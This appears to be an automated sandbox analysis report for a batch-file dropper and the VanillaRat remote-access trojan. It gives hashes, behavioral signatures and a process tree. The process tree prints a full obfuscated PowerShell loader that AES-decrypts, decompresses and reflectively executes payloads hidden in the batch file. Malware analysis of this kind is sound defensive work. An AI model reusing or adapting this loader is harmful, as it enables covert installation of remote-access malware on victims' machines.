Overview
overview
10Static
static
10Release/Ha...er.bat
windows7-x64
7Release/Ha...er.bat
windows10-1703-x64
10Release/Ha...er.bat
windows10-2004-x64
10Release/Ha...er.bat
windows11-21h2-x64
10Release/Va...at.exe
windows7-x64
8Release/Va...at.exe
windows10-1703-x64
10Release/Va...at.exe
windows10-2004-x64
10Release/Va...at.exe
windows11-21h2-x64
10Analysis
-
max time kernel
18s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
18-08-2024 13:35
Behavioral task
behavioral1
Sample
Release/Handlers/Handler.bat
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
Release/Handlers/Handler.bat
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Release/Handlers/Handler.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
Release/Handlers/Handler.bat
Resource
win11-20240802-en
Behavioral task
behavioral5
Sample
Release/VanillaRat.exe
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
Release/VanillaRat.exe
Resource
win10-20240404-en
Behavioral task
behavioral7
Sample
Release/VanillaRat.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral8
Sample
Release/VanillaRat.exe
Resource
win11-20240802-en
General
-
Target
Release/Handlers/Handler.bat
-
Size
12.7MB
-
MD5
e154d92aa7ecd7728940f32bb2c82cc6
-
SHA1
b004e191ae993b3deab2d77c6f99c64e5de55672
-
SHA256
37be53a96145cd6ad7557e95d85a256377af9d9e126538a4733ebde178254cc5
-
SHA512
b8b822fc4d8295a59700b7750fff7841f56ed877207e622dd7d7b0435ce737f212d5f754c95f2329b87e83c1ae796b07724276473256d8787f0f87b1871121e4
-
SSDEEP
49152:Fh5PUtdFBcAJU7Ygqef4u6NE6BGzp3OtWxgusC7QG5r0Wn9O3oGpWJtPS1P8keqj:4
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
Handler.bat.exepid process 2372 Handler.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 2336 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Handler.bat.exepid process 2372 Handler.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Handler.bat.exedescription pid process Token: SeDebugPrivilege 2372 Handler.bat.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2336 wrote to memory of 2372 2336 cmd.exe Handler.bat.exe PID 2336 wrote to memory of 2372 2336 cmd.exe Handler.bat.exe PID 2336 wrote to memory of 2372 2336 cmd.exe Handler.bat.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d